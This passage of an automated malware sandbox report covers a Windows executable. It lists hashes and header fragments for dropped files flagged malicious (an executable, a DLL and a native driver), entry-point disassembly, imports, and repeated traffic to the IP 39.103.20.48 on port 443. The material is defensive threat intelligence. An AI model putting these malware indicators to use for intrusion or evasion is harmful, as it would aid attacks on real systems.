                                SHA-512:70E23839A31E213DE2231E37DDDBB76B01A02B1256E9E195159C0ED261995B8620DE0110241A85C2D79FB65DF17382D720D04BF9002E52A3EC91A791999BB08F
                                Malicious:false
                                Preview:.PNG........IHDR.............\r.f....pHYs............... .IDATx....n.....&E!J.%M.."..9....."...H..L.....LI:.)..K7..!.4Q...{..d.....[......Z{......<.y<9.o...w....]...q..q..q..q..q..q..q..q..q..q..q..q..q..q..q..q..q......3%.F.1p..rD%.;%rD.1p.....qz.....1n.....p.....qz.....1n...0.^.I..9......c.Z....$.Q..K=.OKp=...e%.(.R.....p-tzD..9.m...+.Un...S...5..F..D......R.ys.?W.....|]....Ke......G......U..1....#^..1|..!.O.OWr.H.w.P..p.V..H.wz..mo.U....?F......k7[2.."....+...&]#..d......<...V\{P..d...8=.9..Al....Wr......Pc`......X.g..\.|i7.....O.B.g.p...]..%.^..T.w....a.u..x..zZ........V.....$.Y.6.t....?*.g.~..@.93.g.....lPn..o...7.p.J.Cq....J....3.<]...X...w..o..\.u...Jv...3e.).9q..6(..s...^.k...#..[Vr.t.47J}..M......:.....I%.Q\cPN.n...R.z;3J..c....q.].~s.J..._.d.........y....ur{:v...A.I%....)..*..t{..(.g.o...;....>..7)~{P~_.....5t{X<.x....J....J.0..YY\b.-&.?...Y7.$.X_.e.......{..Jd.3w...l......q.M...&..*...~f...[./.......w..U.^.{q.`......GVV...5.;Z.`W.-uxV...
                                Process:C:\Users\user\Desktop\287438657364-7643738421.08.exe
                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                Category:dropped
                                Size (bytes):133136
                                Entropy (8bit):6.350273548571922
                                Encrypted:false
                                SSDEEP:3072:NtmH5WKiSogv0HSCcTwk7ZaxbXq+d1ftrt+armpQowbFqD:NYZEHG0yfTPFas+dZZrL9MD
                                MD5:D3709B25AFD8AC9B63CBD4E1E1D962B9
                                SHA1:6281A108C7077B198241159C632749EEC5E0ECA8
                                SHA-256:D2537DC4944653EFCD48DE73961034CFD64FB7C8E1BA631A88BBA62CCCC11948
                                SHA-512:625F46D37BCA0F2505F46D64E7706C27D6448B213FE8D675AD6DF1D994A87E9CEECD7FB0DEFF35FDDD87805074E3920444700F70B943FAB819770D66D9E6B7AB
                                Malicious:true
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 0%
                                Joe Sandbox View:
                                • Filename: 2749837485743-7684385786.05.exe, Detection: malicious, Browse
                                • Filename: 2749837485743-7684385786.05.exe, Detection: malicious, Browse
                                • Filename: 2b687482300.6345827638.08.exe, Detection: malicious, Browse
                                • Filename: 2b687482300.6345827638.08.exe, Detection: malicious, Browse
                                • Filename: 45631.exe, Detection: malicious, Browse
                                • Filename: 45631.exe, Detection: malicious, Browse
                                • Filename: 0000000000000000.exe, Detection: malicious, Browse
                                • Filename: 0000000000000000.exe, Detection: malicious, Browse
                                • Filename: T1#U5b89#U88c5#U52a9#U624b1.0.2.exe, Detection: malicious, Browse
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s.E.7w+.7w+.7w+...V.?w+...E..w+...F.Qw+...P.5w+.>...>w+.7w*..w+...Y.>w+...W.6w+...S.6w+.Rich7w+.........PE..d...Kd.]..........#......*..........P].........@............................................................................................,...x...............,........H...........D...............................................@..@............................text...*).......*.................. ..`.rdata..x_...@...`..................@..@.data....:..........................@....pdata..,...........................@..@.rsrc...............................@..@................................................................................................................................................................................................................................................................................................................
                                Process:C:\Users\user\Desktop\287438657364-7643738421.08.exe
                                File Type:GIF image data, version 89a, 10 x 10
                                Category:dropped
                                Size (bytes):8228
                                Entropy (8bit):7.978965865518848
                                Encrypted:false
                                SSDEEP:192:7Bue6hKvTlByz2GqpoPTgyXrByFCt4lXp9tyey2Q0l:7BuNhyTlBU2dp+1XrBuCgp9vU0l
                                MD5:A315A7E9EE892679B0F8FAB9C1F38D4C
                                SHA1:021BAED46FA2C4AFE75027DC6884D66DFE582AED
                                SHA-256:1974F6C8502515270933350BB921EF7574C04641147F464AD1ADA2FB10691102
                                SHA-512:3BB103FB061DD1E76B86B8C68C569A2096BE4C46F748E7787B8AC1D6E3E9A5B38BA637655290F09E09543AED2B4AF3CEC347BA0D5AB9AA21295D5341CEE95C0B
                                Malicious:false
                                Preview:GIF89a.......,.N.........;.;G_fx5.#DV..g..}A/...l=.2......'o...!.....e.,t..o8.^...B^x..6I*X.DC.Oa..../_...n$_.y..+jb..r...Y4/Rv.....(;....$...g..........~.IN ...-<R7....eZ..q4.....~...}....~t<......|}....x.)U3.`U..s....W..WY..w+o-[..{..l..i`.:.......L'.>...$. .a.x.2#y_(9....d,....=n...%..*.c.........dq.nfLI....!1..2...`.,...~....)w.5E 1.V...0."...cu...p........^|@.-w..+...M.(.GK.y}.N.........}.....-..e.......X...GE.|.-._..*.M.....Mc........9/..fQ.Z.....W.....s...........k?C.q.u.-...Q..."..kt..A..128.......7#...~....1.`..:C.(.C.<y.(..<..'..+.!&.....r..I.....d...W.....-.'.Ec`Nv.8).....!....?.....\..N.3..D...U.....(..#sdY..D"...p.>.W.Q...}.. ..2.A('Q\_y...|..Az..JO.B.A..Q05.)..Q..zd..V..l......S.....dS.x....z^..z...).a.....4.G..........M.,..a..U...\....G...$...Q.7...@.x...x.s..R..0.-3...).x.D..f.I..n.....}..{.p.q.%,.lF.f.Up..UM..Y..1............R.....F.._....Y..u...e^.c...f.'..U.W1g..e#J...Z.W.....w.[...........R.?.m......"@.f..V..fxI
                                Process:C:\Users\user\Desktop\287438657364-7643738421.08.exe
                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                Category:dropped
                                Size (bytes):122880
                                Entropy (8bit):6.002074252556158
                                Encrypted:false
                                SSDEEP:1536:Jd4E7qItA4nbQ0R3rh4Q8/0fp0uQ4S8S7YDLbnTPtrTzvesW7dj9dl4Cp52Fr:Jf7qG3Gyp0p4ZmGLbTPJT7y7aCp5gr
                                MD5:BE8593187A8085D0BA96BA73CDBACBDA
                                SHA1:D2554B24CEAC749D4FC4C56D6C773E69EB541C56
                                SHA-256:33AEBA6CFD297402B050BFD0D3315F2F063B546E2B3413F5A2CC38991AC06140
                                SHA-512:3821D6B1B1B78B40A4D40715F04595BF7F46692E046DF1494CEC227FEB9694AAFAC08484CDC3384B70D6507C0790A24AE42645EDB9AAD83B32A3D4942DFE3660
                                Malicious:true
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......d... .E .E .Ek..D%.Ek..D..Ek..D*.E0N.D).E0N.D..E0N.D..Ek..D#.E .EB.EhO.D!.EhO.D!.EhOHE!.E . E!.EhO.D!.ERich .E........PE..d....w.g.........." ...).....................................................0............`.........................................`...........(.......H.................... ..x... ...8...............................@............ ...............................text............................... ..`.rdata....... ......................@..@.data...0...........................@....pdata..............................@..@.rsrc...H...........................@..@.reloc..x.... ......................@..B........................................................................................................................................................................................................................................
                                Process:C:\Users\user\Desktop\287438657364-7643738421.08.exe
                                File Type:PE32+ executable (native) x86-64, for MS Windows
                                Category:dropped
                                Size (bytes):28272
                                Entropy (8bit):6.228740525083608
                                Encrypted:false
                                SSDEEP:384:83YUY30d1Kgf4AtcTmwZ/22a97C5ohYh3IB96Oys2+l0skiM0HMFrba8no0ceD/P:8OUkgfdZ9pRyv+uPzCMHo3q4tDghN
                                MD5:EFD0D6EAAF4AC868C9FB7F6B5F51FB20
                                SHA1:788666FB17622D4EE08C6AAAD4B382915BF4394D
                                SHA-256:16AACF76E10998C870F1F7FF2A7B03C29666B949E6B4F021178347364832E49E
                                SHA-512:ECEADFAD1D8AD3347FFFBA46B59A883DE6999C074F84A4D8BC65A566D10DD0F7158A05E916E383C62D725B76F9C904941EF0F143C5F167CAC9D326DFB2D8E718
                                Malicious:true
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ri...:...:...:...:...:...:...:...:...:...:...:...:...:...:...:...:...:Rich...:........................PE..d....S.V.........."......:..........l...............................................F...........................................................(............`.......P..p.......D....A...............................................@...............................text....,.......................... ..h.rdata.......@.......2..............@..H.data........P.......:..............@....pdata.......`.......<..............@..HPAGE....l....p.......>.............. ..`INIT.................@.............. ....rsrc................J..............@..B.reloc...............N..............@..B........................................................................................................................................................................................
                                File type:PE32+ executable (GUI) x86-64, for MS Windows
                                Entropy (8bit):0.08121435698808738
                                TrID:
                                • Win64 Executable GUI (202006/5) 92.65%
                                • Win64 Executable (generic) (12005/4) 5.51%
                                • Generic Win/DOS Executable (2004/3) 0.92%
                                • DOS Executable Generic (2002/1) 0.92%
                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                File name:287438657364-7643738421.08.exe
                                File size:30'886'912 bytes
                                MD5:12771744b7de8ffb1f0dddf3ac8ed2f4
                                SHA1:c05938c681c3c840a9e484bed33c48fcd033dd27
                                SHA256:4df10f78a78892fea0c94ef9aca83ddac4045a1b2bec807f4bf563ac14551224
                                SHA512:d4ec616cb51388ac364bf6d5abbf2dfe25010f8fdcbd5ae8d90e6b79a9789ca76006432f903355305a95d4730955762113c8b4471227b42823a87ddd83ce375e
                                SSDEEP:3072:Y+JwGTjkeMwWO4Y7gDRq1OLNjXlQSupp:ZJTjkDwWNYLItXtcp
                                TLSH:6D671615262000A5F71A87348956F9D0A6A67C794BE4E2CFE2387D3ADE321C3593B61F
                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............._..._..._..._..._..._..._..5_..._..8_..._..._..._..._..._..p_..._..6_..._Rich..._................PE..d.....XZ..........#
                                Icon Hash:8a80809292808001
                                Entrypoint:0x140004e80
                                Entrypoint Section:.text
                                Digitally signed:false
                                Imagebase:0x140000000
                                Subsystem:windows gui
                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                DLL Characteristics:TERMINAL_SERVER_AWARE
                                Time Stamp:0x5A587FC5 [Fri Jan 12 09:28:37 2018 UTC]
                                TLS Callbacks:
                                CLR (.Net) Version:
                                OS Version Major:5
                                OS Version Minor:2
                                File Version Major:5
                                File Version Minor:2
                                Subsystem Version Major:5
                                Subsystem Version Minor:2
                                Import Hash:31cc4901c4470c461b7b4afe57ed63f3
                                Instruction
                                dec eax
                                sub esp, 28h
                                call 00007F9045264AA4h
                                dec eax
                                add esp, 28h
                                jmp 00007F904525ED36h
                                int3
                                int3
                                dec eax
                                mov dword ptr [esp+08h], ecx
                                dec eax
                                sub esp, 00000088h
                                dec eax
                                lea ecx, dword ptr [0000D4B9h]
                                call dword ptr [000082E3h]
                                dec eax
                                mov eax, dword ptr [0000D5A4h]
                                dec eax
                                mov dword ptr [esp+58h], eax
                                inc ebp
                                xor eax, eax
                                dec eax
                                lea edx, dword ptr [esp+60h]
                                dec eax
                                mov ecx, dword ptr [esp+58h]
                                call 00007F904526A1F6h
                                dec eax
                                mov dword ptr [esp+50h], eax
                                dec eax
                                cmp dword ptr [esp+50h], 00000000h
                                je 00007F9045262B93h
                                dec eax
                                mov dword ptr [esp+38h], 00000000h
                                dec eax
                                lea eax, dword ptr [esp+48h]
                                dec eax
                                mov dword ptr [esp+30h], eax
                                dec eax
                                lea eax, dword ptr [esp+40h]
                                dec eax
                                mov dword ptr [esp+28h], eax
                                dec eax
                                lea eax, dword ptr [0000D464h]
                                dec eax
                                mov dword ptr [esp+20h], eax
                                dec esp
                                mov ecx, dword ptr [esp+50h]
                                dec esp
                                mov eax, dword ptr [esp+58h]
                                dec eax
                                mov edx, dword ptr [esp+60h]
                                xor ecx, ecx
                                call 00007F904526A1A4h
                                jmp 00007F9045262B74h
                                dec eax
                                mov eax, dword ptr [esp+00000088h]
                                dec eax
                                mov dword ptr [0000D530h], eax
                                dec eax
                                lea eax, dword ptr [esp+00000088h]
                                dec eax
                                add eax, 08h
                                dec eax
                                mov dword ptr [0000D4BDh], eax
                                dec eax
                                mov eax, dword ptr [0000D516h]
                                dec eax
                                mov dword ptr [0000D387h], eax
                                Programming Language:
                                • [C++] VS2010 build 30319
                                • [ C ] VS2010 build 30319
                                • [ASM] VS2010 build 30319
                                • [IMP] VS2008 SP1 build 30729
                                • [LNK] VS2010 build 30319
                                 Name | Virtual Address | Virtual Size | Is in Section
                                 IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                 IMAGE_DIRECTORY_ENTRY_IMPORT | 0xf904 | 0x50 | .rdata
                                 IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x1d6f000 | 0xc088 | .rsrc
                                 IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x1d6e000 | 0x858 | .pdata
                                 IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                 IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x1d7c000 | 0x160 | .reloc
                                 IMAGE_DIRECTORY_ENTRY_DEBUG | 0xd3b0 | 0x1c | .rdata
                                 IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                 IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                 IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                 IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                 IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                 IMAGE_DIRECTORY_ENTRY_IAT | 0xd000 | 0x338 | .rdata
                                 IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                 IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                 IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0xb776 | 0xb800 | 7562aea4300b0a660a5939f140fe62b6 | False | 0.516007133152174 | data | 6.198028056797998 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0xd000 | 0x33c6 | 0x3400 | 10fbb23f485a7b3126f7bd500efc4e97 | False | 0.36478365384615385 | data | 4.729795884700604 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x11000 | 0x1d5c840 | 0x1d58c00 | 9a3be4c4122c6caa02f074abffb2f21f | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata | 0x1d6e000 | 0x858 | 0xa00 | 944d1977c688c60d0d795e2506ac3238 | False | 0.41875 | data | 3.893632257077923 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0x1d6f000 | 0xc088 | 0xc200 | 8a3ee32d65f93c0456a6a64a275d151b | False | 0.12808070231958762 | data | 4.363440716953925 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x1d7c000 | 0x34a | 0x400 | afef91ea5ec9e1735d279b4047d87ed6 | False | 0.279296875 | data | 2.4933342466924753 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x1d6f508 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | United States | 0.14650537634408603
RT_ICON | 0x1d6f7f0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | English | United States | 0.30405405405405406
RT_ICON | 0x1d6f918 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | English | United States | 0.3070362473347548
RT_ICON | 0x1d707c0 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | United States | 0.4842057761732852
RT_ICON | 0x1d71068 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | United States | 0.3670520231213873
RT_ICON | 0x1d715d0 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | United States | 0.1087136929460581
RT_ICON | 0x1d73b78 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | United States | 0.23170731707317074
RT_ICON | 0x1d74c20 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | United States | 0.3599290780141844
RT_ICON | 0x1d75088 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | United States | 0.14650537634408603
RT_ICON | 0x1d75370 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | English | United States | 0.30405405405405406
RT_ICON | 0x1d75498 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | English | United States | 0.3070362473347548
RT_ICON | 0x1d76340 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | United States | 0.4842057761732852
RT_ICON | 0x1d76be8 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | United States | 0.3670520231213873
RT_ICON | 0x1d77150 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | United States | 0.1087136929460581
RT_ICON | 0x1d796f8 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | United States | 0.23170731707317074
RT_ICON | 0x1d7a7a0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | United States | 0.3599290780141844
RT_MENU | 0x1d7ac08 | 0x8e | data | English | United States | 0.6971830985915493
RT_DIALOG | 0x1d7ac98 | 0x150 | data | English | United States | 0.5833333333333334
RT_STRING | 0x1d7ade8 | 0x42 | data | English | United States | 0.6363636363636364
RT_ACCELERATOR | 0x1d7ae2c | 0x10 | data | English | United States | 1.25
RT_GROUP_ICON | 0x1d7ae3c | 0x76 | data | English | United States | 0.6440677966101694
RT_GROUP_ICON | 0x1d7aeb4 | 0x76 | data | English | United States | 0.6610169491525424
RT_MANIFEST | 0x1d7af2c | 0x15a | ASCII text, with CRLF line terminators | English | United States | 0.5491329479768786
DLL | Import
KERNEL32.dll | CreateMutexW, GetLastError, OutputDebugStringW, SetProcessShutdownParameters, ReleaseMutex, GetCommandLineW, GetModuleFileNameW, LoadLibraryW, GetProcAddress, FreeLibrary, WritePrivateProfileStringW, GetSystemDirectoryW, CreateFileW, CloseHandle, ExitProcess, CreateThread, OpenFileMappingW, MapViewOfFile, GetStdHandle, OpenProcess, WaitForSingleObject, FlushFileBuffers, HeapSize, HeapReAlloc, HeapAlloc, GetStringTypeW, LCMapStringW, WriteConsoleW, SetStdHandle, MultiByteToWideChar, Sleep, HeapFree, IsValidCodePage, GetOEMCP, GetACP, GetCPInfo, LeaveCriticalSection, EnterCriticalSection, GetConsoleMode, GetConsoleCP, WideCharToMultiByte, SetFilePointer, GetStartupInfoW, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, RtlVirtualUnwind, RtlLookupFunctionEntry, RtlCaptureContext, EncodePointer, DecodePointer, GetModuleHandleW, WriteFile, RtlUnwindEx, FreeEnvironmentStringsW, GetEnvironmentStringsW, SetHandleCount, InitializeCriticalSectionAndSpinCount, GetFileType, DeleteCriticalSection, FlsGetValue, FlsSetValue, FlsFree, SetLastError, GetCurrentThreadId, FlsAlloc, HeapSetInformation, GetVersion, HeapCreate, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, VirtualAlloc
USER32.dll | SendMessageW, FindWindowW, MessageBoxW, EndDialog, PostQuitMessage, EndPaint, BeginPaint, DefWindowProcW, DestroyWindow, UpdateWindow, ShowWindow, CreateWindowExW, RegisterClassExW, LoadCursorW, LoadIconW, DispatchMessageW, TranslateMessage, TranslateAcceleratorW, GetMessageW, LoadAcceleratorsW, LoadStringW, DialogBoxParamW
SHELL32.dll | SHCreateDirectoryExW, SHGetFolderPathW, CommandLineToArgvW
Language of compilation system | Country where language is spoken
English | United States
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                Jan 7, 2025 04:15:40.128386021 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:40.128469944 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:40.128520012 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:40.128638029 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:40.128681898 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:40.128689051 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:40.128695011 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:40.128727913 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:40.345557928 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:40.345609903 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:40.345648050 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:40.345673084 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:40.345691919 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:40.345717907 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:40.346142054 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:40.346178055 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:40.346199036 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:40.346205950 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:40.346223116 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:40.346246004 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:40.347104073 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:40.347141981 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:40.347170115 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:40.347177982 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:40.347191095 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:40.347218037 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:40.348011971 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:40.348069906 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:40.348989010 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:40.349047899 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:40.349097013 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:40.349148989 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:40.350091934 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:40.350125074 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:40.350145102 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:40.350152969 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:40.350164890 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:40.350192070 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:40.351010084 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:40.351051092 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:40.351064920 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:40.351073027 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:40.351092100 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:40.351108074 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:40.351932049 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:40.351984978 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:40.568523884 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:40.568572044 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:40.568649054 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:40.568680048 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:40.568694115 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:40.568721056 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:40.568780899 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:40.568839073 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:40.568886042 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:40.568936110 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:40.569070101 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:40.569118023 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:40.569329023 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:40.569381952 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:40.569490910 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:40.569575071 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:40.569636106 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:40.569680929 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:40.569827080 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:40.569878101 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:40.570066929 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:40.570103884 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:40.570116043 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:40.570125103 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:40.570142031 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:40.570166111 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:40.570420027 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:40.570466042 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:40.570662975 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:40.570693970 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:40.570708036 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:40.570717096 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:40.570730925 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:40.570754051 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:40.570955992 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:40.570995092 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:40.571017027 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:40.571023941 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:40.571046114 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:40.571063995 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:40.571464062 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:40.571513891 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:40.571567059 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:40.571626902 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:40.571775913 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:40.571826935 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:40.571827888 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:40.571841002 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:40.571873903 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:40.571875095 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:40.571885109 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:40.571928978 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:40.572480917 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:40.572545052 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:40.572578907 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:40.572635889 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:40.572725058 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:40.572772980 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:40.574919939 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:40.574982882 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:40.575067043 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:40.575120926 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:40.654747963 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:40.654814005 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:40.654993057 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:40.655047894 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:40.655149937 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:40.655213118 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:40.791542053 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:40.791585922 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:40.791618109 CET49712443192.168.2.839.103.20.48
